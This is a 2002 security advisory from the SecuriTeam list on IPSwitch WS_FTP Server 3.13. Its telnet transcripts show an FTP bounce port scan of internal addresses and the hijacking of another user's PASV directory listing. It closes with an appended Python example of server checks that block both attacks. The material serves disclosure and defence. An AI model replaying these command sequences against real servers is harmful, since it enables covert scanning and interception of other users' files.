[NT] IPSwitch WS_FTP Server PASV Session Hijacking and PASV Port Scan

From: support@securiteam.com
To: list@securiteam.com
Date: 25 Oct 2002 17:07:50 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  IPSwitch WS_FTP Server PASV Session Hijacking and PASV Port Scan
------------------------------------------------------------------------

SUMMARY

IPSwitch's WS_FTP Server allows remote attackers to do two things: use it
to bounce attacks through the FTP server, and hijack existing FTP
sessions.

DETAILS

Vulnerable systems:
 * IPSwitch WS_FTP Server version 3.13

Impact:
The FTP bounce vulnerability allows a remote attacker to cause the FTP
server to create a connection to any IP address on any TCP port greater
than 1024. Thus, the attacker can scan Internet addresses anonymously
along with any internal addresses that the FTP server has access to. More
information on this vulnerability can be found here:
http://www.cert.org/advisories/CA-1997-27.html

The PASV connection hijacking vulnerability allows a remote attacker to
intercept directory listings and file downloads from other users; file
uploads may also be spoofed. No authentication is necessary to execute
this attack. More information on this vulnerability can be found here:
http://www.kb.cert.org/vuls/id/2558

Details:
This demonstrates the FTP bounce vulnerability. The internal IP address
"192.168.1.20" is listening on port 8080 (the PORT argument "31,144"
encodes port 31*256+144 = 8080), while "192.168.2.30" is down or not
reachable on port 8080. The server's reply to LIST reveals which is which:

$ telnet x.ternal.ip.address 21
Trying x.ternal.ip.address...
Connected to x.ternal.ip.address.
Escape character is '^]'.
220-lh1 X2 WS_FTP Server 3.1.3.EVAL (696969696)
220-Sun Jun 04 00:00:00 1989
220-27 days remaining on evaluation.
220 lh1 X2 WS_FTP Server 3.1.3.EVAL (969696969)
USER lowhalo
331 Password required
PASS el_ach
230 user logged in
PORT 192,168,1,20,31,144
200 command successful
LIST
150 Opening ASCII data connection for directory listing
226 transfer complete
PORT 192,168,2,30,31,144
200 command successful
LIST
425 Can't open data connection.

This demonstrates the PASV connection hijacking vulnerability:
$ telnet x.x.x.x 21
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
220-lh1 X2 WS_FTP Server 3.1.3.EVAL (696969696)
220-Sun Jun 04 00:00:00 1989
220-27 days remaining on evaluation.
220 lh1 X2 WS_FTP Server 3.1.3.EVAL (969696969)
USER lowhalo
331 Password required
PASS el_ach
230 user logged in
PASV
227 Entering Passive Mode (192,168,1,1,4,23).
LIST
150 Opening ASCII data connection for directory listing

Next, from another IP address, connect to the port announced in the PASV
reply ("4,23" encodes port 4*256+23 = 1047) and receive the first user's
directory listing:
$ telnet x.x.x.x 1047
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
drwxr-x--- 2 lowhalo System 0 Jan 0 00:00 .
drwxr-x--- 2 lowhalo System 0 Jan 0 00:00 ..
-rwxr-x--- 1 lowhalo System 1337 Jan 0 00:00 lh
Connection closed by foreign host.
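As an added example (not part of the advisory or of WS_FTP itself), here are the two server-side checks that close both holes: a PORT command is only honoured when its address is the control connection's own peer and its port is unprivileged, and a PASV data connection is only accepted from the host that opened the control connection. The client addresses are not given in the advisory, so the example assumes TEST-NET addresses for the attacker and the second host.

```python
import re

# Constructed inputs: the PORT commands and PASV reply from the advisory's
# transcripts, plus assumed peer addresses (TEST-NET) for the two connections.
CONTROL_PEER = "203.0.113.5"   # assumed: host that opened the control connection
DATA_PEER = "198.51.100.7"     # assumed: "another IP address" that connects to the PASV port
PORT_LINES = ["PORT 192,168,1,20,31,144", "PORT 192,168,2,30,31,144", "PORT 203,0,113,5,4,1"]
PASV_REPLY = "227 Entering Passive Mode (192,168,1,1,4,23)."

SIX = r"(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})"
PORT_RE = re.compile(r"^PORT\s+" + SIX + r"\s*$", re.IGNORECASE)
PASV_RE = re.compile(r"\(" + SIX + r"\)")


def decode_hostport(fields):
    """Turn an RFC 959 h1,h2,h3,h4,p1,p2 tuple into ("h1.h2.h3.h4", p1*256+p2)."""
    nums = [int(x) for x in fields]
    if any(n > 255 for n in nums):
        raise ValueError("field out of range: %r" % (fields,))
    return ".".join(map(str, nums[:4])), nums[4] * 256 + nums[5]


def check_port(control_peer, line):
    """PORT policy: refuse third-party (bounce) targets and privileged ports.

    Returns None for lines that are not PORT commands, otherwise a tuple
    (verdict, host, port, reason).
    """
    m = PORT_RE.match(line)
    if not m:
        return None
    host, port = decode_hostport(m.groups())
    if host != control_peer:
        return ("reject", host, port, "bounce: data address differs from control peer")
    if port < 1024:
        return ("reject", host, port, "privileged data port")
    return ("accept", host, port, "")


def check_pasv_peer(pasv_reply, control_peer, data_peer):
    """PASV policy: only the control peer may connect to the announced port."""
    _host, port = decode_hostport(PASV_RE.search(pasv_reply).groups())
    if data_peer != control_peer:
        return ("reject", port, "hijack: data connection from a different host")
    return ("accept", port, "")


if __name__ == "__main__":
    for line in PORT_LINES:
        print(line, "->", check_port(CONTROL_PEER, line))
    print(PASV_REPLY, "->", check_pasv_peer(PASV_REPLY, CONTROL_PEER, DATA_PEER))
```

With these rules the two bounce PORT commands from the transcript are rejected before any outbound connection is made, and the second host's connection to port 1047 is dropped instead of receiving the first user's listing.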

ADDITIONAL INFORMATION

The information has been provided by low halo <lowhalo@hushmail.com>.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com